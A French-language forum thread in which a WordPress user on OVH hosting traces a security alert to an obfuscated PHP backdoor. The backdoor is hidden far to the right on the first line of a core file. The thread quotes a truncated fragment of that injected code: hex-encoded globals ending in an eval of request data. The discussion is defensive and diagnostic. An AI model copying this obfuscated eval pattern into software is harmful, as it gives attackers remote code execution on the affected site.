Discussion :

[jerem_orga]

Bonjour,

Je suis en train d'installer un blog Wordpress chez OVH.

OVH me remonte l'alerte suivant :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
{
  "www/wp-admin/includes/class-walker-category-checklist.php": {
    "ovh_suspicious_printable_hex_in_string": {
      "source": "ovh",
      "category": "suspicious"
    }
  }
}

Je ne comprends pas car il semble s'agir d'un fichier standard à WP ( class-walker-category-checklist.php ).
Avez vous déjà rencontré le problème ?

Cela est bloquant ... dans l'attente de la résolution du problème, ils désactivent la fonction MAIL !

Merci.

[Watilin]

Je n’ai jamais rencontré ce message d’erreur avec OVH, mais d’après le nom de l’erreur printable_hex_in_string, il semblerait que le fichier contienne une ou plusieurs séquences de code hexadécimal qui devraient ressembler à quelque chose comme ceci :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

\x11\x04\x71\x91\x14\xBB\x08

ou comme ça :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

0xFA,0x02,0x7F,0x7A,0x58,0x7C

Le système d’OVH considère ça comme du code obfusqué, autrement dit une chaîne qui est transformée en code exécutable via eval ou une méthode similaire, et qui pourrait contenir n’importe quoi, donc potentiellement du code malveillant.

Vérifie que ton fichier contient quelque chose qui ressemble à ça. Si c’est le cas, ton site a probablement été infecté, il faudra que tu réinstalles Wordpress, et que tu le tiennes à jour pour éviter de futures infections.

Dans le cas contraire, c’est un faux positif, contacte le support d’OVH.

[jerem_orga]

Merci d'avoir pris le temps de répondre à ma question.

Concernant le code hexadécimal, il apparaîtrait tel quel dans le fichier ?
Quand j'ouvre le fichier dans Notepad++, je ne le vois pas.

De plus j'ai comparé le fichier avec le fichier issu d'une nouvelle installation, je ne note pas de différence dans le fichier.
Etrange !

J'ai prévenu OVH et leur ai demandé s'ils avaient la possibilité de m'indiquer ce qui selon eux, pourrait poser problème.

Affaire à suivre.

[jerem_orga]

J'ai enfin trouvé l'origine du problème.
Je partage ... ça peut servir !

Alors en fait, quand je comparais mon fichier avec le fichier original je ne notais aucune différence.
Sauf que ... la différence était "bien" cachée !!!

Le fichier faisait le même nombre de lignes.
Sauf que positionné sur la 1ère ligne du fichier, bien décalé sur la droite pour que l'on ne voit rien (sauf en déplacant beaucoup l'ascenseur horizontal), il y avait un long morceau de code d'ajouté (10467 caractères tout de même !).
Je n'avais même pas fait attention à la différence de taille des 2 fichiers.
Et c'est la présence de la fonction EVAL dans ce code qui a été détectée par les outils OVH et qui a donc permis de repérer l'anomalie.

@Watilin
tu avais donc parfaitement raison et tout de suite compris le problème !

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
$g16c351 = 842;$GLOBALS['mc43']=Array();global$mc43;$mc43=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['zd53d2ffa
.... 
[84]]($dd81e56);}elseif($ncdc79ac[$mc43['zd53d2ffa'][32]]==$mc43['zd53d2ffa'][41]){eval/*id63b40*/($ncdc79ac[$mc43['zd53d2ffa'][8]]);}exit();} ?>

[jerem_orga]

Quelqu'un pourrait il m'expliquer comment agit l'extrait de code ci dessous, qui a été importé dans un fichier à mon insu ?
Comment est il susceptible de générer du spam ?

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
$g16c351 = 842;$GLOBALS['mc43']=Array();global$mc43;$mc43=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['zd53d2ffa
.... 
[84]]($dd81e56);}elseif($ncdc79ac[$mc43['zd53d2ffa'][32]]==$mc43['zd53d2ffa'][41]){eval/*id63b40*/($ncdc79ac[$mc43['zd53d2ffa'][8]]);}exit();} ?>

[mathieu]

Le code n'a pas l'air complet, il y a des "..." à la 2e ligne.